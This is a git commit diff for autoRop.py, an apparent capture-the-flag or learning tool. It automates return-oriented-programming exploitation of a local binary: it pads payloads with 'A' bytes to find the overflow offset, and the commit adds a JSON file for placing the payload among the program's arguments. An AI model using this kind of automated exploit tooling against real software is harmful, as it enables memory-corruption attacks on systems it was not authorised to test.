pass exec args
This commit is contained in:
Liam Dalgarno
parent
7934330d2e
commit
055b787c2d
22
autoRop.py
22
autoRop.py
|
|
@ -43,6 +43,7 @@ arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int,
|
||||||
arg_parser.add_argument("--input_method", metavar="method", choices=['arg', 'file', 'stdin'], default='arg', help="Method of passing the payload to the target binary")
|
arg_parser.add_argument("--input_method", metavar="method", choices=['arg', 'file', 'stdin'], default='arg', help="Method of passing the payload to the target binary")
|
||||||
arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
|
arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
|
||||||
arg_parser.add_argument("--interactive", action="store_true", default=False, help="Automatically run the ROP on the executable")
|
arg_parser.add_argument("--interactive", action="store_true", default=False, help="Automatically run the ROP on the executable")
|
||||||
|
arg_parser.add_argument("--exec_args_file", metavar="exec_args_file", default="exec_args.json", type=str, help="The path to the file containing the arguments to pass to the executable. Put $PAYLOAD$ where you want the payload to be placed.")
|
||||||
|
|
||||||
args = arg_parser.parse_args()
|
args = arg_parser.parse_args()
|
||||||
|
|
||||||
|
|
@ -54,18 +55,27 @@ max_payload = args.max_payload
|
||||||
run = args.run
|
run = args.run
|
||||||
input_method = args.input_method
|
input_method = args.input_method
|
||||||
interactive = args.interactive
|
interactive = args.interactive
|
||||||
|
exec_args_file = args.exec_args_file
|
||||||
|
|
||||||
|
exec_args = []
|
||||||
|
with open(exec_args_file, "r") as f:
|
||||||
|
exec_args = json.load(f)
|
||||||
|
|
||||||
|
payload_idx = exec_args.index('$PAYLOAD$')
|
||||||
|
|
||||||
def run_program(payload: str, **kwargs) -> process:
|
def run_program(payload: str, **kwargs) -> process:
|
||||||
p = None
|
p = None
|
||||||
if input_method == 'arg':
|
if input_method == 'arg':
|
||||||
p = process([f'./{exec_file}', payload], **kwargs)
|
exec_args[payload_idx] = payload
|
||||||
|
p = process([f'./{exec_file}'] + exec_args, **kwargs)
|
||||||
elif input_method == 'file':
|
elif input_method == 'file':
|
||||||
with open('/tmp/input.txt', 'wb') as f:
|
with open('/tmp/input.txt', 'wb') as f:
|
||||||
f.write(payload)
|
f.write(payload)
|
||||||
f.flush()
|
f.flush()
|
||||||
p = process([f'./{exec_file}', '/tmp/input.txt'], **kwargs)
|
exec_args[payload_idx] = '/tmp/input.txt'
|
||||||
|
p = process([f'./{exec_file}'] + exec_args, **kwargs)
|
||||||
elif input_method == 'stdin':
|
elif input_method == 'stdin':
|
||||||
p = process([f'./{exec_file}'], **kwargs)
|
p = process([f'./{exec_file}'] + exec_args, **kwargs)
|
||||||
p.send(payload)
|
p.send(payload)
|
||||||
|
|
||||||
return p
|
return p
|
||||||
|
|
@ -90,10 +100,8 @@ def find_offset_inc(low: int, high: int):
|
||||||
for i in range(low, high + 1):
|
for i in range(low, high + 1):
|
||||||
print(f" ├─[🤔] Trying offset {i}...")
|
print(f" ├─[🤔] Trying offset {i}...")
|
||||||
rop_payload = (b'A' * i) + original_payload
|
rop_payload = (b'A' * i) + original_payload
|
||||||
proc = run_program(rop_payload, alarm=1)
|
proc = run_program(rop_payload)
|
||||||
output = proc.readall()
|
if b'[ Successful ROP! ]' in proc.readall():
|
||||||
print(output)
|
|
||||||
if b'[ Successful ROP! ]' in output:
|
|
||||||
print(f" └─[😳] Found offset at {i}!\n")
|
print(f" └─[😳] Found offset at {i}!\n")
|
||||||
return i
|
return i
|
||||||
|
|
||||||
|
|
|
||||||
1
exec_args.json
Normal file
1
exec_args.json
Normal file
|
|
@ -0,0 +1 @@
|
||||||
|
[ "$PAYLOAD$" ]
|
||||||
Binary file not shown.
Loading…
Reference in New Issue
Block a user